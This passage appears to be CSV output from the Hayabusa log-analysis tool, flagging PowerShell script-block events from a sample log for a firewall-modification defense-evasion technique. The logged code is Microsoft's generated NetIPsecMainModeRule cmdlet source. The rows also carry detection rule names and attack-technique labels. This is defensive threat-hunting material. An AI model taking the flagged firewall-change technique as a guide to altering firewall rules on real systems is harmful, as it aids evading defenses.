[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] 
[Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw 
} } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] 